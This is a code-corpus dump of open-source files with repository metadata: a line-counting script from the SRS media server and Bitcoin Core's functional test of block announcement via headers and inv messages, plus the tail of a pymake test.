self.assertTrue(e.is_filesystem_dependent)
if __name__ == '__main__':
unittest.main()
|
mozilla/pymake
|
tests/datatests.py
|
Python
|
mit
| 6,946 | 0.001152 |
#!/usr/bin/python
'''
The MIT License (MIT)
Copyright (c) 2013-2015 SRS(simple-rtmp-server)
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
#################################################################################
# to stat the code and comments lines
#################################################################################
import sys
def trace(msg):
print msg
pass
def info(msg):
print msg
pass
def verbose(msg):
#print msg
pass
def process(f, code_file):
info("process file success")
(stat_code, stat_block_comments, stat_line_comments) = (0, 0, 0)
is_block_comments = False
is_line_comments = False
for line in f.readlines():
line = line.strip()
if is_block_comments:
if "*/" in line:
verbose("[block][end] %s"%line)
is_block_comments = False
is_line_comments = False
else:
verbose("[block][cont] %s"%line)
stat_block_comments += 1
continue
if line.startswith("/*"):
verbose("[block][start] %s"%line)
is_block_comments = True
is_line_comments = False
stat_block_comments += 1
# inline block comments
if is_block_comments:
if "*/" in line:
verbose("[block][end] %s"%line)
is_block_comments = False
is_line_comments = False
continue
if line.startswith("//"):
verbose("[line] %s"%line)
is_block_comments = False
is_line_comments = True
stat_line_comments += 1
continue
verbose("[code] %s"%line)
is_block_comments = False
is_line_comments = False
stat_code += 1
total = stat_code + stat_block_comments + stat_line_comments
comments = stat_block_comments + stat_line_comments
trace("total:%s code:%s comments:%s block:%s line:%s file:%s"%(total, stat_code, comments, stat_block_comments, stat_line_comments, code_file))
return (0, total, stat_code, comments, stat_block_comments, stat_line_comments, code_file)
def do_stat(code_file):
f = None
try:
f = open(code_file, "r")
info("open file success");
return process(f, code_file)
finally:
if f is not None:
f.close()
info("close file success")
return (-1, 0, 0, 0, 0, 0, None)
code_file = None
if __name__ == "__main__":
if len(sys.argv) <= 1:
print "to stat the code and comments lines"
print "Usage: python %s <code_file>"%(sys.argv[0])
print " code_file: the code(header or source) file to stat"
print "Example:"
print " python %s src/core/srs_core.hpp"%(sys.argv[0])
sys.exit(-1)
code_file = sys.argv[1]
info("stat %s"%(code_file))
do_stat(code_file)
|
drunknbass/srs
|
trunk/research/code-statistic/cs.py
|
Python
|
mit
| 3,920 | 0.006633 |
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test behavior of headers messages to announce blocks.
Setup:
- Two nodes:
- node0 is the node-under-test. We create two p2p connections to it. The
first p2p connection is a control and should only ever receive inv's. The
second p2p connection tests the headers sending logic.
- node1 is used to create reorgs.
test_null_locators
==================
Sends two getheaders requests with null locator values. First request's hashstop
value refers to validated block, while second request's hashstop value refers to
a block which hasn't been validated. Verifies only the first request returns
headers.
test_nonnull_locators
=====================
Part 1: No headers announcements before "sendheaders"
a. node mines a block [expect: inv]
send getdata for the block [expect: block]
b. node mines another block [expect: inv]
send getheaders and getdata [expect: headers, then block]
c. node mines another block [expect: inv]
peer mines a block, announces with header [expect: getdata]
d. node mines another block [expect: inv]
Part 2: After "sendheaders", headers announcements should generally work.
a. peer sends sendheaders [expect: no response]
peer sends getheaders with current tip [expect: no response]
b. node mines a block [expect: tip header]
c. for N in 1, ..., 10:
* for announce-type in {inv, header}
- peer mines N blocks, announces with announce-type
[ expect: getheaders/getdata or getdata, deliver block(s) ]
- node mines a block [ expect: 1 header ]
Part 3: Headers announcements stop after large reorg and resume after getheaders or inv from peer.
- For response-type in {inv, getheaders}
* node mines a 7 block reorg [ expect: headers announcement of 8 blocks ]
* node mines an 8-block reorg [ expect: inv at tip ]
* peer responds with getblocks/getdata [expect: inv, blocks ]
* node mines another block [ expect: inv at tip, peer sends getdata, expect: block ]
* node mines another block at tip [ expect: inv ]
* peer responds with getheaders with an old hashstop more than 8 blocks back [expect: headers]
* peer requests block [ expect: block ]
* node mines another block at tip [ expect: inv, peer sends getdata, expect: block ]
* peer sends response-type [expect headers if getheaders, getheaders/getdata if mining new block]
* node mines 1 block [expect: 1 header, peer responds with getdata]
Part 4: Test direct fetch behavior
a. Announce 2 old block headers.
Expect: no getdata requests.
b. Announce 3 new blocks via 1 headers message.
Expect: one getdata request for all 3 blocks.
(Send blocks.)
c. Announce 1 header that forks off the last two blocks.
Expect: no response.
d. Announce 1 more header that builds on that fork.
Expect: one getdata request for two blocks.
e. Announce 16 more headers that build on that fork.
Expect: getdata request for 14 more blocks.
f. Announce 1 more header that builds on that fork.
Expect: no response.
Part 5: Test handling of headers that don't connect.
a. Repeat 10 times:
1. Announce a header that doesn't connect.
Expect: getheaders message
2. Send headers chain.
Expect: getdata for the missing blocks, tip update.
b. Then send 9 more headers that don't connect.
Expect: getheaders message each time.
c. Announce a header that does connect.
Expect: no response.
d. Announce 49 headers that don't connect.
Expect: getheaders message each time.
e. Announce one more that doesn't connect.
Expect: disconnect.
"""
from test_framework.blocktools import create_block, create_coinbase
from test_framework.messages import CInv
from test_framework.mininode import (
CBlockHeader,
NODE_WITNESS,
P2PInterface,
mininode_lock,
msg_block,
msg_getblocks,
msg_getdata,
msg_getheaders,
msg_headers,
msg_inv,
msg_sendheaders,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
sync_blocks,
wait_until,
)
DIRECT_FETCH_RESPONSE_TIME = 0.05
class BaseNode(P2PInterface):
def __init__(self):
super().__init__()
self.block_announced = False
self.last_blockhash_announced = None
self.recent_headers_announced = []
def send_get_data(self, block_hashes):
"""Request data for a list of block hashes."""
msg = msg_getdata()
for x in block_hashes:
msg.inv.append(CInv(2, x))
self.send_message(msg)
def send_get_headers(self, locator, hashstop):
msg = msg_getheaders()
msg.locator.vHave = locator
msg.hashstop = hashstop
self.send_message(msg)
def send_block_inv(self, blockhash):
msg = msg_inv()
msg.inv = [CInv(2, blockhash)]
self.send_message(msg)
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(b) for b in new_blocks]
self.send_message(headers_message)
def send_getblocks(self, locator):
getblocks_message = msg_getblocks()
getblocks_message.locator.vHave = locator
self.send_message(getblocks_message)
def wait_for_getdata(self, hash_list, timeout=60):
if hash_list == []:
return
test_function = lambda: "getdata" in self.last_message and [x.hash for x in self.last_message["getdata"].inv] == hash_list
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_block_announcement(self, block_hash, timeout=60):
test_function = lambda: self.last_blockhash_announced == block_hash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def on_inv(self, message):
self.block_announced = True
self.last_blockhash_announced = message.inv[-1].hash
def on_headers(self, message):
if len(message.headers):
self.block_announced = True
for x in message.headers:
x.calc_sha256()
# append because headers may be announced over multiple messages.
self.recent_headers_announced.append(x.sha256)
self.last_blockhash_announced = message.headers[-1].sha256
def clear_block_announcements(self):
with mininode_lock:
self.block_announced = False
self.last_message.pop("inv", None)
self.last_message.pop("headers", None)
self.recent_headers_announced = []
def check_last_headers_announcement(self, headers):
"""Test whether the last headers announcements received are right.
Headers may be announced across more than one message."""
test_function = lambda: (len(self.recent_headers_announced) >= len(headers))
wait_until(test_function, timeout=60, lock=mininode_lock)
with mininode_lock:
assert_equal(self.recent_headers_announced, headers)
self.block_announced = False
self.last_message.pop("headers", None)
self.recent_headers_announced = []
def check_last_inv_announcement(self, inv):
"""Test whether the last announcement received had the right inv.
inv should be a list of block hashes."""
test_function = lambda: self.block_announced
wait_until(test_function, timeout=60, lock=mininode_lock)
with mininode_lock:
compare_inv = []
if "inv" in self.last_message:
compare_inv = [x.hash for x in self.last_message["inv"].inv]
assert_equal(compare_inv, inv)
self.block_announced = False
self.last_message.pop("inv", None)
class SendHeadersTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def mine_blocks(self, count):
"""Mine count blocks and return the new tip."""
# Clear out block announcements from each p2p listener
[x.clear_block_announcements() for x in self.nodes[0].p2ps]
self.nodes[0].generate(count)
return int(self.nodes[0].getbestblockhash(), 16)
def mine_reorg(self, length):
"""Mine a reorg that invalidates length blocks (replacing them with # length+1 blocks).
Note: we clear the state of our p2p connections after the
to-be-reorged-out blocks are mined, so that we don't break later tests.
return the list of block hashes newly mined."""
self.nodes[0].generate(length) # make sure all invalidated blocks are node0's
sync_blocks(self.nodes, wait=0.1)
for x in self.nodes[0].p2ps:
x.wait_for_block_announcement(int(self.nodes[0].getbestblockhash(), 16))
x.clear_block_announcements()
tip_height = self.nodes[1].getblockcount()
hash_to_invalidate = self.nodes[1].getblockhash(tip_height - (length - 1))
self.nodes[1].invalidateblock(hash_to_invalidate)
all_hashes = self.nodes[1].generate(length + 1) # Must be longer than the orig chain
sync_blocks(self.nodes, wait=0.1)
return [int(x, 16) for x in all_hashes]
def run_test(self):
# Setup the p2p connections
inv_node = self.nodes[0].add_p2p_connection(BaseNode())
# Make sure NODE_NETWORK is not set for test_node, so no block download
# will occur outside of direct fetching
test_node = self.nodes[0].add_p2p_connection(BaseNode(), services=NODE_WITNESS)
# Ensure verack's have been processed by our peer
inv_node.sync_with_ping()
test_node.sync_with_ping()
self.test_null_locators(test_node, inv_node)
self.test_nonnull_locators(test_node, inv_node)
def test_null_locators(self, test_node, inv_node):
tip = self.nodes[0].getblockheader(self.nodes[0].generate(1)[0])
tip_hash = int(tip["hash"], 16)
inv_node.check_last_inv_announcement(inv=[tip_hash])
test_node.check_last_inv_announcement(inv=[tip_hash])
self.log.info("Verify getheaders with null locator and valid hashstop returns headers.")
test_node.clear_block_announcements()
test_node.send_get_headers(locator=[], hashstop=tip_hash)
test_node.check_last_headers_announcement(headers=[tip_hash])
self.log.info("Verify getheaders with null locator and invalid hashstop does not return headers.")
block = create_block(int(tip["hash"], 16), create_coinbase(tip["height"] + 1), tip["mediantime"] + 1)
block.solve()
test_node.send_header_for_blocks([block])
test_node.clear_block_announcements()
test_node.send_get_headers(locator=[], hashstop=int(block.hash, 16))
test_node.sync_with_ping()
assert_equal(test_node.block_announced, False)
inv_node.clear_block_announcements()
test_node.send_message(msg_block(block))
inv_node.check_last_inv_announcement(inv=[int(block.hash, 16)])
def test_nonnull_locators(self, test_node, inv_node):
tip = int(self.nodes[0].getbestblockhash(), 16)
# PART 1
# 1. Mine a block; expect inv announcements each time
self.log.info("Part 1: headers don't start before sendheaders message...")
for i in range(4):
self.log.debug("Part 1.{}: starting...".format(i))
old_tip = tip
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
# Try a few different responses; none should affect next announcement
if i == 0:
# first request the block
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# next try requesting header and block
test_node.send_get_headers(locator=[old_tip], hashstop=tip)
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
test_node.clear_block_announcements() # since we requested headers...
elif i == 2:
# this time announce own block via headers
inv_node.clear_block_announcements()
height = self.nodes[0].getblockcount()
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
new_block = create_block(tip, create_coinbase(height + 1), block_time)
new_block.solve()
test_node.send_header_for_blocks([new_block])
test_node.wait_for_getdata([new_block.sha256])
test_node.send_message(msg_block(new_block))
test_node.sync_with_ping() # make sure this block is processed
wait_until(lambda: inv_node.block_announced, timeout=60, lock=mininode_lock)
inv_node.clear_block_announcements()
test_node.clear_block_announcements()
self.log.info("Part 1: success!")
self.log.info("Part 2: announce blocks with headers after sendheaders message...")
# PART 2
# 2. Send a sendheaders message and test that headers announcements
# commence and keep working.
test_node.send_message(msg_sendheaders())
prev_tip = int(self.nodes[0].getbestblockhash(), 16)
test_node.send_get_headers(locator=[prev_tip], hashstop=0)
test_node.sync_with_ping()
# Now that we've synced headers, headers announcements should work
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
height = self.nodes[0].getblockcount() + 1
block_time += 10 # Advance far enough ahead
for i in range(10):
self.log.debug("Part 2.{}: starting...".format(i))
# Mine i blocks, and alternate announcing either via
# inv (of tip) or via headers. After each, new blocks
# mined by the node should successfully be announced
# with block header, even though the blocks are never requested
for j in range(2):
self.log.debug("Part 2.{}.{}: starting...".format(i, j))
blocks = []
for b in range(i + 1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
if j == 0:
# Announce via inv
test_node.send_block_inv(tip)
test_node.wait_for_getheaders()
# Should have received a getheaders now
test_node.send_header_for_blocks(blocks)
# Test that duplicate inv's won't result in duplicate
# getdata requests, or duplicate headers announcements
[inv_node.send_block_inv(x.sha256) for x in blocks]
test_node.wait_for_getdata([x.sha256 for x in blocks])
inv_node.sync_with_ping()
else:
# Announce via headers
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks])
# Test that duplicate headers won't result in duplicate
# getdata requests (the check is further down)
inv_node.send_header_for_blocks(blocks)
inv_node.sync_with_ping()
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
inv_node.sync_with_ping()
# This block should not be announced to the inv node (since it also
# broadcast it)
assert "inv" not in inv_node.last_message
assert "headers" not in inv_node.last_message
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
height += 1
block_time += 1
self.log.info("Part 2: success!")
self.log.info("Part 3: headers announcements can stop after large reorg, and resume after headers/inv from peer...")
# PART 3. Headers announcements can stop after large reorg, and resume after
# getheaders or inv from peer.
for j in range(2):
self.log.debug("Part 3.{}: starting...".format(j))
# First try mining a reorg that can propagate with header announcement
new_block_hashes = self.mine_reorg(length=7)
tip = new_block_hashes[-1]
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=new_block_hashes)
block_time += 8
# Mine a too-large reorg, which should be announced with a single inv
new_block_hashes = self.mine_reorg(length=8)
tip = new_block_hashes[-1]
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
block_time += 9
fork_point = self.nodes[0].getblock("%02x" % new_block_hashes[0])["previousblockhash"]
fork_point = int(fork_point, 16)
# Use getblocks/getdata
test_node.send_getblocks(locator=[fork_point])
test_node.check_last_inv_announcement(inv=new_block_hashes)
test_node.send_get_data(new_block_hashes)
test_node.wait_for_block(new_block_hashes[-1])
for i in range(3):
self.log.debug("Part 3.{}.{}: starting...".format(j, i))
# Mine another block, still should get only an inv
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
if i == 0:
# Just get the data -- shouldn't cause headers announcements to resume
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# Send a getheaders message that shouldn't trigger headers announcements
# to resume (best header sent will be too old)
test_node.send_get_headers(locator=[fork_point], hashstop=new_block_hashes[1])
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 2:
# This time, try sending either a getheaders to trigger resumption
# of headers announcements, or mine a new block and inv it, also
# triggering resumption of headers announcements.
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
if j == 0:
test_node.send_get_headers(locator=[tip], hashstop=0)
test_node.sync_with_ping()
else:
test_node.send_block_inv(tip)
test_node.sync_with_ping()
# New blocks should now be announced with header
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
self.log.info("Part 3: success!")
self.log.info("Part 4: Testing direct fetch behavior...")
tip = self.mine_blocks(1)
height = self.nodes[0].getblockcount() + 1
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
# Create 2 blocks. Send the blocks, then send the headers.
blocks = []
for b in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
inv_node.send_message(msg_block(blocks[-1]))
inv_node.sync_with_ping() # Make sure blocks are processed
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
# should not have received any getdata messages
with mininode_lock:
assert "getdata" not in test_node.last_message
# This time, direct fetch should work
blocks = []
for b in range(3):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks], timeout=DIRECT_FETCH_RESPONSE_TIME)
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
# Now announce a header that forks the last two blocks
tip = blocks[0].sha256
height -= 1
blocks = []
# Create extra blocks for later
for b in range(20):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Announcing one block on fork should not trigger direct fetch
# (less work than tip)
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks[0:1])
test_node.sync_with_ping()
with mininode_lock:
assert "getdata" not in test_node.last_message
# Announcing one more block on fork should trigger direct fetch for
# both blocks (same work as tip)
test_node.send_header_for_blocks(blocks[1:2])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[0:2]], timeout=DIRECT_FETCH_RESPONSE_TIME)
# Announcing 16 more headers should trigger direct fetch for 14 more
# blocks
test_node.send_header_for_blocks(blocks[2:18])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[2:16]], timeout=DIRECT_FETCH_RESPONSE_TIME)
# Announcing 1 more header should not trigger any response
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks[18:19])
test_node.sync_with_ping()
with mininode_lock:
assert "getdata" not in test_node.last_message
self.log.info("Part 4: success!")
# Now deliver all those blocks we announced.
[test_node.send_message(msg_block(x)) for x in blocks]
self.log.info("Part 5: Testing handling of unconnecting headers")
# First we test that receipt of an unconnecting header doesn't prevent
# chain sync.
for i in range(10):
self.log.debug("Part 5.{}: starting...".format(i))
test_node.last_message.pop("getdata", None)
blocks = []
# Create two more blocks.
for j in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Send the header of the second block -> this won't connect.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[1]])
test_node.wait_for_getheaders()
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks])
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
assert_equal(int(self.nodes[0].getbestblockhash(), 16), blocks[1].sha256)
blocks = []
# Now we test that if we repeatedly don't send connecting headers, we
# don't go into an infinite loop trying to get them to connect.
MAX_UNCONNECTING_HEADERS = 10
for j in range(MAX_UNCONNECTING_HEADERS + 1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
for i in range(1, MAX_UNCONNECTING_HEADERS):
# Send a header that doesn't connect, check that we get a getheaders.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[i]])
test_node.wait_for_getheaders()
# Next header will connect, should re-set our count:
test_node.send_header_for_blocks([blocks[0]])
# Remove the first two entries (blocks[1] would connect):
blocks = blocks[2:]
# Now try to see how many unconnecting headers we can send
# before we get disconnected. Should be 5*MAX_UNCONNECTING_HEADERS
for i in range(5 * MAX_UNCONNECTING_HEADERS - 1):
# Send a header that doesn't connect, check that we get a getheaders.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[i % len(blocks)]])
test_node.wait_for_getheaders()
# Eventually this stops working.
test_node.send_header_for_blocks([blocks[-1]])
# Should get disconnected
test_node.wait_for_disconnect()
self.log.info("Part 5: success!")
# Finally, check that the inv node never received a getdata request,
# throughout the test
assert "getdata" not in inv_node.last_message
if __name__ == '__main__':
SendHeadersTest().main()
|
Flowdalic/bitcoin
|
test/functional/p2p_sendheaders.py
|
Python
|
mit
| 26,404 | 0.002197 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.